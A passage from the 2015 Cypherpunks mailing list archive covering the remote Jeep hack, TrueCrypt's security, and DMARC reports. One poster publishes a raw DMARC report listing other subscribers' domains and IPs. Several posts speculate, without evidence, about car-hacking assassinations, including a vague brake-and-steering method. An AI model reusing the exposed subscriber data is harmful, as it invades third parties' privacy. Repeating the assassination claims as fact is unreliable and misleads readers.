la9TD2c/lAdfJriAsu0iBqInq7hv3ssz/RMif6hoR146edSdT3KxM18siGAEejIN A0PJGF2nTC+YH15PUEjndvFxq6sG11kBzBp3b7F8jX1/YJZhmA+0J/iNHLhOV8Q= =MQer -----END PGP SIGNATURE----- From list at sysfu.com Fri Jul 24 17:44:59 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 17:44:59 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: On Fri, 24 Jul 2015 17:14:19 -0700, Zenaan Harkness wrote: > Plenty of suspicious private (and not so) jet crashes over the years > too. Non-overridable remote-control systems - what could possibly go > wrong? I've heard activist Ken O'Keefe claim that most or all modern passenger jets are equipped with a 'Flight Termination System'. Maybe this is one such provider? http://www.kratos-msi.com/products/flight-termination-products/ From odinn.cyberguerrilla at riseup.net Fri Jul 24 17:49:20 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Fri, 24 Jul 2015 17:49:20 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: Message-ID: <55B2DD10.7090600@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yep. On 07/24/2015 03:16 PM, Seth wrote: > I don't know if many are aware of this (I discovered it by > accident myself) but if you enable dmarc reports for your domain > and mail server, you'll start to get reports back that include many > lurker addresses on the Cypherpunks list. > > I can start posting them publicly if anyone's interested. > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVst0QAAoJEGxwq/inSG8C+m0IAJ4aTnUJ8DAWzlBnnMhoyac1 AId1LHCAwWq+UueeeOHdMc6H+qwI01+Ys8niWfU2e5MLRHQhf5lE1mwr28vcgZpy AzTemDF6XO7an1KfTD4r8YLGc9PTNPQRqfG9EOg/+YQI4IpQvBv+KOz0nqBm3mPJ sNgoCo6wsf1UVtLw9sn3Xpw0vWSKsRzHa9YL7wSU+n0GO4RO9EXDmTNmXWAcXp9Z Fjd8F9OxrW3XQEsGpt3wfOp7a58dJYPvHQFh60jDi9oXQXxw1S8VpIn50NIitL1l 9TfO9wxEXDtDGf3kBL4zFX+WMsuXI57b1y6hxfp1fTSQHYuTvt1PXdN+Pr3nlSg= =rOPD -----END PGP SIGNATURE----- From oottela at cs.helsinki.fi Fri Jul 24 08:17:31 2015 From: oottela at cs.helsinki.fi (Markus Ottela) Date: Fri, 24 Jul 2015 18:17:31 +0300 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <55B2570B.6090106@cs.helsinki.fi> What the warning by developers means is, in the event a vulnerability would be found in Truecrypt, no one would be there to fix it. Except for the entire open source community who would publish dozens of articles "here's how to fix the vulnerability in source code before recompiling it" accompanied with warnings "doing this breaks the truecrypt licence". This is true, and you might be in trouble in case the anonymous developers want to stop being anonymous and prosecute you across different jurisdictions. So, unlikely. Also read these: http://istruecryptauditedyet.com/ http://blog.cryptographyengineering.com/2015/04/truecrypt-report.html https://www.grc.com/misc/truecrypt/truecrypt.htm I heard TC uses insufficiently low iteration count for PBKDF2? -- this doesn't change the fact a high entropy passphrase (>128bits) remains unbreakable in feasible time. On 24.07.2015 17:46, Yush Bhardwaj wrote: > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ > > http://truecrypt.sourceforge.net/ > /* > */ > /* > */ > /* > */ > /* > */ > /* > */ > /* > */ > /*Yush Bhardwaj*/ > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3430 bytes Desc: not available URL: From M373 at riseup.net Fri Jul 24 16:46:28 2015 From: M373 at riseup.net (M373) Date: Fri, 24 Jul 2015 18:46:28 -0500 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: <55B2CE54.8020301@riseup.net> It's not a matter of credulity in believing that authorities would carry out such an assassination, the problem is asserting such an act without direct evidence. As I said, and as insider Richard Clarke said, it would be difficult to show. "What has been revealed as a result of some research at universities is that it's relatively easy to hack your way into the control system of a car, and to do such things as cause acceleration when the driver doesn't want acceleration, to throw on the brakes when the driver doesn't want the brakes on, to launch an air bag," "in the case of Michael Hastings, what evidence is available publicly is consistent with a car cyber attack. And the problem with that is you can't prove it." It's a conundrum uncovering such operations. If the US has not taken such acts yet, it, and others, will do so. It's akin to the older problem of knowing if someone was poisoned in a way to appear as a natural malady. Intel agencies have long used such measures. On 24-Jul-15 17:33, Eric Hernandez wrote: > "There is reason to believe that intelligence agencies for major > powers -- including the United States -- know how to remotely seize > control of a car. So if there were a cyber attack on the car -- and > I'm not saying there was, I think whoever did it would probably get > away with it." > > - Richard Clarke, US Counter-Terrorism Czar during Clinton and Bush. > > On July 24, 2015 3:11:31 PM PDT, Seth wrote: > > On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > > On 24-Jul-15 11:52, Georgi Guninski wrote: > > I seriously wonder if there's any assassinations > that've happened with the use of this mechanism. (1. > wait until approaching intersection at high speed, 2. > disengage brakes + steering wheel, is probably very > effective) > > We were discussing this in chat. Someone suggested "sooner > or later sploits like this will appear on black/gray > sploits markets or even become public". Then likely car > accidents will go up and maybe mainstream media will cry > "car/hackers injure human" (the other way is not news, it > is statistics). > > Some conspiracists conjectured this might have happened in the > fatal, fiery crash of the investigative journalist Michael > Hastings in L.A., but without hard evidence it's the purview > of the credulous prone to conspiracy theories rather than an > actual one (of which there are many). > > > Right, I mean the official story was such a credulous one, and no one in > squeaky clean US power structure had any motive to eliminate an > investigative journalist like Hastings. > > Oh those credulous conspiracy theorists with their crazy theories about > assassination via car hacking. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3999 bytes Desc: not available URL: From list at sysfu.com Fri Jul 24 19:39:59 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 19:39:59 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: <55B2DD10.7090600@riseup.net> References: <55B2DD10.7090600@riseup.net> Message-ID: OK, as requested, here's the first report from fastmail.fm - - 7758186 FastMail Pty Ltd dmarc at fastmail.com https://fastmail.com/ - 1437696000 1437782399 - sysfu.com

none

none 100 - - 209.85.160.181 1 - none pass fail - resistentialist.com gmail.com sysfu.com - - sysfu.com main pass pass - gmail.com mfrom pass - - 209.85.212.173 2 - none pass fail - jeffhammett.com gmail.com sysfu.com - - sysfu.com main pass pass - gmail.com mfrom pass - - 209.85.160.175 2 - none pass fail - resistentialist.com gmail.com sysfu.com - - sysfu.com main pass pass - gmail.com mfrom pass - - 212.227.17.20 1 - none pass fail - segordon.net gmx.com sysfu.com - - sysfu.com main pass pass - gmx.com mfrom pass - - 209.85.212.177 1 - none pass fail - kvet.ch hellyeah.com sysfu.com - - 1e100.net 20130820 fail fail (message has been altered) - sysfu.com main pass pass - hellyeah.com mfrom pass - - 209.85.212.181 2 - none fail fail - jeffhammett.com gmail.com sysfu.com - - sysfu.com main fail fail (message has been altered) - gmail.com mfrom pass - - 195.140.195.194 3 - none pass fail - fastmail.fm cpunks.org sysfu.com - - sysfu.com main pass pass - cpunks.org mfrom permerror - - 195.140.195.194 1 - none fail fail - fastmail.fm cpunks.org sysfu.com - - sysfu.com main fail fail (message has been altered) - cpunks.org mfrom permerror - - 209.85.212.181 1 - none pass fail - kvet.ch hellyeah.com sysfu.com - - 1e100.net 20130820 fail fail (message has been altered) - sysfu.com main pass pass - hellyeah.com mfrom pass - - 209.85.212.169 1 - none pass fail - jeffhammett.com gmail.com sysfu.com - - sysfu.com main pass pass - gmail.com mfrom pass - - 209.141.47.85 51 - none pass fail - afflictions.org cpunks.org sysfu.com - - sysfu.com main pass pass - cpunks.org mfrom pass - - 212.227.15.18 1 - none fail fail - segordon.net gmx.com sysfu.com - - sysfu.com main fail fail (message has been altered) - gmx.com mfrom pass - - 209.141.47.85 17 - none fail fail - afflictions.org cpunks.org sysfu.com - - sysfu.com main fail fail (message has been altered) - cpunks.org mfrom pass - - 212.227.15.18 1 - none pass fail - segordon.net gmx.com sysfu.com - - sysfu.com main pass pass - gmx.com mfrom pass - - 212.227.17.21 1 - none pass fail - segordon.net gmx.com sysfu.com - - sysfu.com main pass pass - gmx.com mfrom pass - - 209.85.212.178 1 - none pass fail - kvet.ch hellyeah.com sysfu.com - - 1e100.net 20130820 fail fail (message has been altered) - sysfu.com main pass pass - hellyeah.com mfrom pass - - 209.85.160.176 1 - none fail fail - resistentialist.com gmail.com sysfu.com - - sysfu.com main fail fail (message has been altered) - gmail.com mfrom pass From guninski at guninski.com Fri Jul 24 09:52:18 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 24 Jul 2015 19:52:18 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: <20150724165218.GD2562@sivokote.iziade.m$> On Sat, Jul 25, 2015 at 01:27:09AM +0900, Lodewijk andré de la porte wrote: > Not physically separating essential vehicle control from the onboard > entertainment system, because what could possibly go wrong? > Maybe because it is cheaper, developers, developers, developers? > I seriously wonder if there's any assassinations that've happened with the > use of this mechanism. (1. wait until approaching intersection at high > speed, 2. disengage brakes + steering wheel, is probably very effective) > We were discussing this in chat. Someone suggested "sooner or later sploits like this will appear on black/gray sploits markets or even become public". Then likely car accidents will go up and maybe mainstream media will cry "car/hackers injure human" (the other way is not news, it is statistics). Won't sheeple think about their smart cars? How will the stock go? btw, Who are the owners/manufacterers of this jeep? AMC? From yushbhardwaj91 at gmail.com Fri Jul 24 07:46:03 2015 From: yushbhardwaj91 at gmail.com (Yush Bhardwaj) Date: Fri, 24 Jul 2015 20:16:03 +0530 Subject: True Crypt is Not Secure Message-ID: BitLocker is better or I should try something else ? WARNING: Using TrueCrypt is not secure http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ http://truecrypt.sourceforge.net/ *Yush Bhardwaj* -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1204 bytes Desc: not available URL: From shelley at misanthropia.org Fri Jul 24 20:54:41 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 20:54:41 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: <55B2DD10.7090600@riseup.net> Message-ID: <20150725035425.642A5680179@frontend2.nyi.internal> Thanks. Interesting that I don't show up under .FM, I have my MX & DNS handled there. I'll mess around with this, thanks. -s ---------- On July 24, 2015 7:49:43 PM Seth wrote: > OK, as requested, here's the first report from fastmail.fm > > > > - > > > - > > 7758186 > > FastMail Pty Ltd > > dmarc at fastmail.com > > https://fastmail.com/ > > > - > > 1437696000 > > 1437782399 > > > > > > > - > > sysfu.com > >

none

> > none > > 100 > > > > > - > > > - > > 209.85.160.181 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > resistentialist.com > > gmail.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmail.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.212.173 > > 2 > > > - > > none > > pass > > fail > > > > > > > - > > jeffhammett.com > > gmail.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmail.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.160.175 > > 2 > > > - > > none > > pass > > fail > > > > > > > - > > resistentialist.com > > gmail.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmail.com > > mfrom > > pass > > > > > > > > > - > > > - > > 212.227.17.20 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > segordon.net > > gmx.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmx.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.212.177 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > kvet.ch > > hellyeah.com > > sysfu.com > > > > > - > > > - > > 1e100.net > > 20130820 > > fail > > fail (message has been altered) > > > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > hellyeah.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.212.181 > > 2 > > > - > > none > > fail > > fail > > > > > > > - > > jeffhammett.com > > gmail.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > fail > > fail (message has been altered) > > > > > - > > gmail.com > > mfrom > > pass > > > > > > > > > - > > > - > > 195.140.195.194 > > 3 > > > - > > none > > pass > > fail > > > > > > > - > > fastmail.fm > > cpunks.org > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > cpunks.org > > mfrom > > permerror > > > > > > > > > - > > > - > > 195.140.195.194 > > 1 > > > - > > none > > fail > > fail > > > > > > > - > > fastmail.fm > > cpunks.org > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > fail > > fail (message has been altered) > > > > > - > > cpunks.org > > mfrom > > permerror > > > > > > > > > - > > > - > > 209.85.212.181 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > kvet.ch > > hellyeah.com > > sysfu.com > > > > > - > > > - > > 1e100.net > > 20130820 > > fail > > fail (message has been altered) > > > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > hellyeah.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.212.169 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > jeffhammett.com > > gmail.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmail.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.141.47.85 > > 51 > > > - > > none > > pass > > fail > > > > > > > - > > afflictions.org > > cpunks.org > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > cpunks.org > > mfrom > > pass > > > > > > > > > - > > > - > > 212.227.15.18 > > 1 > > > - > > none > > fail > > fail > > > > > > > - > > segordon.net > > gmx.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > fail > > fail (message has been altered) > > > > > - > > gmx.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.141.47.85 > > 17 > > > - > > none > > fail > > fail > > > > > > > - > > afflictions.org > > cpunks.org > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > fail > > fail (message has been altered) > > > > > - > > cpunks.org > > mfrom > > pass > > > > > > > > > - > > > - > > 212.227.15.18 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > segordon.net > > gmx.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmx.com > > mfrom > > pass > > > > > > > > > - > > > - > > 212.227.17.21 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > segordon.net > > gmx.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > gmx.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.212.178 > > 1 > > > - > > none > > pass > > fail > > > > > > > - > > kvet.ch > > hellyeah.com > > sysfu.com > > > > > - > > > - > > 1e100.net > > 20130820 > > fail > > fail (message has been altered) > > > > > - > > sysfu.com > > main > > pass > > pass > > > > > - > > hellyeah.com > > mfrom > > pass > > > > > > > > > - > > > - > > 209.85.160.176 > > 1 > > > - > > none > > fail > > fail > > > > > > > - > > resistentialist.com > > gmail.com > > sysfu.com > > > > > - > > > - > > sysfu.com > > main > > fail > > fail (message has been altered) > > > > > - > > gmail.com > > mfrom > > pass > > > > > > > > From cathalgarvey at cathalgarvey.me Fri Jul 24 13:38:13 2015 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Fri, 24 Jul 2015 21:38:13 +0100 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> Message-ID: <55B2A235.5010609@cathalgarvey.me> Without getting into the issue of whether patents encourage innovation.. I do think that medical devices are a special case. If you have a heart implant, that thing needs to be "unhackable", but also totally verifiably safe. So there should be firmware signing, no mutable state, verifiable memory safety...but the code should be open source, and if need be the firmware signing key for each device (needs to be different for each device!) should be accessible by a legitimate owner. So, no more remote-hackable heart implants, but doctors and cardiac technicians can still apply critical patches and inspect the source for sanity. On 24/07/15 21:26, Lodewijk andré de la porte wrote: > Anyone care for a law that will: > > 1. Ban unhackable vehicles and other life-critical devices (meaning: > life-critical software must be rewritable) > 2. Require all life-critical software to be released in source format, > for the purpose of public auditing, improving it's safety features and > employing the software on the devices it is intended for. > 3. Any tools used to translate the source to writable code must also be > provided in the manner of 2. > > These laws should still allow manufacturers to: > 1. Spy on their users without that being changed > 2. Lock down their code so competitors may not use it (proprietary open > source) > 3. Have software in the machines that is not opened; so long as it is > properly (verifiably) isolated from essential systems > 4. Legally own the entire machine > 5. Drop guarantees when non-security-related modifications have been made > etc > > This law should be as precise and immutable as possible. This is not a > matter of "I want to hack things" or "competition would be better if it > were open" or "I want to own what I have/use", etc, etc. Being precise > with the law allows it to pass more readily. > > Personally I think if everything were required open source and > self-compiled; that would objectively be better for humanity as a whole. > For protecting innovation there's patents, closing the source is excess. > Etc. etc. > > But this is not about fun. This is about extremely basic safety. It is > about national security; if 500,000 cars go haywire at the same time a > lot of deaths, directly and indirectly, can be expected. And it's not > just the cars; it's also the industrial machines, medical equipment, the > metro's and trains, the automated cars and busses and trucks and > aircraft, medium sized hobbyist drones, heaters, stoves and ovens, > automated doors, elevators, fire, smoke and other emergency alarms, etc. > > Should a foreign country cyberattack whilst doing any other kind of > large scale attack; the effects could be devastating. Should a person be > marked for assassination, no one would be the wiser. > > I'd argue for similar protection for fridges, televisions, smartphones, > etc, etc, as more and more items are expected to become networked and > essential for upholding basic freedoms and ways of life. And I'd argue > to have it for privacy; not just essential safety. > > > Simply put; the simple version of the law above is imperative for > personal and national security. And it doesn't exist. > > (note: all countries should be more worried about cybersecurity. I > cannot trust my government to act as it should if every public servant > can be blackmailed or thoroughly spied upon. It's not hard to improve > security; but it's much harder now that nobody's doing it, and now that > it's given no priority) -- Scientific Director, IndieBio EU Programme Now running in Cork, Ireland May->July Learn more at indie.bio and follow along! Twitter: @onetruecathal Phone: +353876363185 miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM peerio.com: cathalgarvey From jdb10987 at yahoo.com Fri Jul 24 15:20:20 2015 From: jdb10987 at yahoo.com (jim bell) Date: Fri, 24 Jul 2015 22:20:20 +0000 (UTC) Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2A235.5010609@cathalgarvey.me> References: <55B2A235.5010609@cathalgarvey.me> Message-ID: <1725354647.2377948.1437776420870.JavaMail.yahoo@mail.yahoo.com> From: Cathal Garvey >Without getting into the issue of whether patents encourage innovation..  >I do think that medical devices are a special case. If you have a heart >implant, that thing needs to be "unhackable", but also totally >verifiably safe. So there should be firmware signing, no mutable state, >verifiable memory safety...but the code should be open source, and if >need be the firmware signing key for each device (needs to be different >for each device!) should be accessible by a legitimate owner. >So, no more remote-hackable heart implants, but doctors and cardiac >technicians can still apply critical patches and inspect the source for >sanity. It should be fairly simple to protect against heart-implant hacks.  First, communication with them is probably limited to inductively-coupled signalling, at a fairly high level.  Secondly, it should be based on a two-way challenge/response system:  The external device signals a code, call it a password, to which the implant would respond with a reply, which itself includes a randomized code.  The external device reads that randomized code, processes it in some way (presumably a hash), and retransmits it to the implant.  Only if the implanted device receives what it considers the correct code, would it allow further manipulation.  Presumably, any attempt to illegitimately access such a device wouldn't be close enough to read the implant's reply signals, and thus couldn't proceed further. "Do you have have a match?".   "No, but I have a lighter".  "Even better".   "Until they go wrong".          Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4079 bytes Desc: not available URL: From admin at pilobilus.net Fri Jul 24 19:25:04 2015 From: admin at pilobilus.net (Steve Kinney) Date: Fri, 24 Jul 2015 22:25:04 -0400 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2CE54.8020301@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B2CE54.8020301@riseup.net> Message-ID: <55B2F380.9060806@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/24/2015 07:46 PM, M373 wrote: > "in the case of Michael Hastings, what evidence is available > publicly is consistent with a car cyber attack. And the problem > with that is you can't prove it." And if the target of such an attack becomes suspicious, his comments about those suspicions become evidence of insanity and help to account for his untimely demise. Need some volunteers and/or a funding angel to create a corpus of howto docs that identify the RF receiver parts in automotive ECM units and their associated wiring harnesses, including which pins to cut to assure radio silence in both directions. Oh wait - voiding your warranty would be more proof of insanity. :o/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVsvN+AAoJEDZ0Gg87KR0LqGgP/0ZIg7+dfZsNg1ojXQO2LHQx UN3BPoW/KzO4VxTZZ+3lO7yqWl9w+zw7ZQSMzgjoTpId5GDnuT/bbpdj2+GW6r4q /qnhmASE0jTjtev4mBEbPglAC6slEJREHimpfN1+TunU4xM7ZYu0dJIiu0OF7Z8o csTFAzkIq6rRclzQJP4qi7yzz5xaP77ND+VTptR7Gqdo7/ynatfhmxaQMAzAVNlF ZVIo8CFKcwihLlLvy2u92ZppjN6KnmDUWjxtt4EfmxunKR+09EZnkhwBCk37FF5A WuJPIfTg20yawIs3riKVKNo3sAEBJFQI/8/izkzaXC9SYnlrpVftR8b0kz07K/Xo CREn6m7LPDezPzXahvNAVdI0cMbKbQLruZvrMzRlai18Z2ya8GpFIa0XA5zytXQq XSEnlFBqsaHRUqMehoyeKY7PKUMwrmwtOSeVlFeyEX3zCjT9U+k4+LlWQFjcjSyp 2TZ/hqj9giWJr9q0JqRQXUl9ns5W/pmGjwRDWJPqNNEzpdo60WSxSkxoYUUS6XCU lJ+YxpkWKZTl/93oLl8xAcDTmN3DA4YN3CSvo9/n1vP2pgtYmQhoVo+h1GP/8cu/ Zs5yUd4W8IG6LAhr4kAVSaaU4qbopcYAQ7kypPUw4Q5BPZ71whyDDtosB257Ik7j CfwZjtW0D80HrNSZlV0f =huBF -----END PGP SIGNATURE----- From drwho at virtadpt.net Fri Jul 24 22:28:41 2015 From: drwho at virtadpt.net (The Doctor) Date: Fri, 24 Jul 2015 22:28:41 -0700 Subject: True Crypt is Not Secure In-Reply-To: <55B2D4FC.3040805@riseup.net> References: <55B2D4FC.3040805@riseup.net> Message-ID: <55B31E89.4080106@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/24/2015 05:14 PM, odinn wrote: > I thought that this was already answered long ago... but it keeps > getting brought up from time to time. Perhaps it is time for a new Cypherpunks FAQ. > Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend > cryptsetup, the "Swiss Army Knife of Disk Encryption." In any > event, Later releases of cryptsetup incorporate TrueCrypt support. v1.6.6 definitely has it; I don't know what release it was introduced in, though. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ > blorple the featureless cube -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVsx6EAAoJED1np1pUQ8RkrjAP/AgvLaPqztROJ0AmwLVPDNUk XuQhLzyaT29rBPOk+RNiMx53CT6giRFLTe3Dm+CxiHsZcz6nNt+tBO7pBy5/ZW8U g0RssKLTMo6QTZK6WEMTIO609Qs3tb4IkATLERt78yVr/vApepHd/l9lBN4d01nF bW/Ut8qxI99wFkw+01i09WbA4Db4v5UFZ/M9IwwHI+dbNxE5hPm5AjwwtSWwHBD2 lnCQuZ8nGGnXAdklJSo2I20NWtpwDfSCmdFhbTF2jW+zMyby/XDbb19qAJWIHTue efEVtvuVYcN+8h4YIb9uhGkFKgb0+F9EU/3+DzQHj/2Tu2vqBm5JPvJgnWmXMtT4 w9dms2L+ui4SypXSOO6AIl6JONAq4sw7ysAVBFbTnEY4YRkpA2pB+Vn00mQkgCa5 ghaMeTUqk0XP5/K49Hgz6FuQRMF3AeDgMFL3zZdahodv6DBjhlr2x8Leylv13E3o SbXgPvCZEx5X9aNYtUc3U02kNg+qWrSW4j1SR1KdUwLdlUqQ7+K4Z9yJ7BtjzhF0 HQBMGxAHKnnpzWrhC7bfmAzcoHNUGJek5ELymDoikRjz4EFrfotu88I81nvFH6TF HNOI6T1M2+79DlAXYF3Z9RaOYcuhlqdG1rsMg1EaArApUIKRl7F+3gU9gC/tCK40 FtSVTebW5Yos9mInLAZV =F/kw -----END PGP SIGNATURE----- From juan.g71 at gmail.com Fri Jul 24 19:20:51 2015 From: juan.g71 at gmail.com (Juan) Date: Fri, 24 Jul 2015 23:20:51 -0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724223457.E4F346800EB@frontend2.nyi.internal> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <20150724223457.E4F346800EB@frontend2.nyi.internal> Message-ID: <55b2f22d.990f370a.af90b.ffffecb3@mx.google.com> On Fri, 24 Jul 2015 15:35:13 -0700 Shelley wrote: > > Oh those credulous conspiracy theorists with their crazy theories > > about assassination via car hacking. > > Calling something a conspiracy theory is a common disinfo tactic. We > used to have to play Spot the Fed, now they out themselves... I was about to comment that calling people 'conspiracy theorists' is a modern version of calling people 'witches'... > > -s > > From zen at freedbms.net Fri Jul 24 17:14:19 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 25 Jul 2015 00:14:19 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: On 7/24/15, Lodewijk andré de la porte wrote: > Not physically separating essential vehicle control from the onboard > entertainment system, because what could possibly go wrong? > > I seriously wonder if there's any assassinations that've happened with the > use of this mechanism. (1. wait until approaching intersection at high > speed, 2. disengage brakes + steering wheel, is probably very effective) > > Gotta love how these cars constantly report their locations :) Princess Diana - although because of the era, that was more sophisticated - retroactively modified systems in the car. Plenty of suspicious private (and not so) jet crashes over the years too. Non-overridable remote-control systems - what could possibly go wrong? From zen at freedbms.net Fri Jul 24 17:16:23 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 25 Jul 2015 00:16:23 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724165218.GD2562@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> Message-ID: On 7/24/15, Georgi Guninski wrote: >> I seriously wonder if there's any assassinations that've happened with >> the >> use of this mechanism. (1. wait until approaching intersection at high >> speed, 2. disengage brakes + steering wheel, is probably very effective) >> > > We were discussing this in chat. > Someone suggested "sooner or later sploits like this > will appear on black/gray sploits markets or even become > public". Then likely car accidents will go up and > maybe mainstream media will cry "car/hackers injure human" > (the other way is not news, it is statistics). So true - headline of "human injures car" is so common we don't even blink these days... From zen at freedbms.net Fri Jul 24 17:22:39 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 25 Jul 2015 00:22:39 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724223457.E4F346800EB@frontend2.nyi.internal> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <20150724223457.E4F346800EB@frontend2.nyi.internal> Message-ID: On 7/24/15, Shelley wrote: > On July 24, 2015 3:20:23 PM Seth wrote: > >> On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: >> >> > On 24-Jul-15 11:52, Georgi Guninski wrote: >> >>> I seriously wonder if there's any assassinations that've happened >> >>> with >> >>> the >> >>> use of this mechanism. (1. wait until approaching intersection at >> >>> high >> >>> speed, 2. disengage brakes + steering wheel, is probably very >> >>> effective) >> >>> >> >> We were discussing this in chat. >> >> Someone suggested "sooner or later sploits like this >> >> will appear on black/gray sploits markets or even become >> >> public". Then likely car 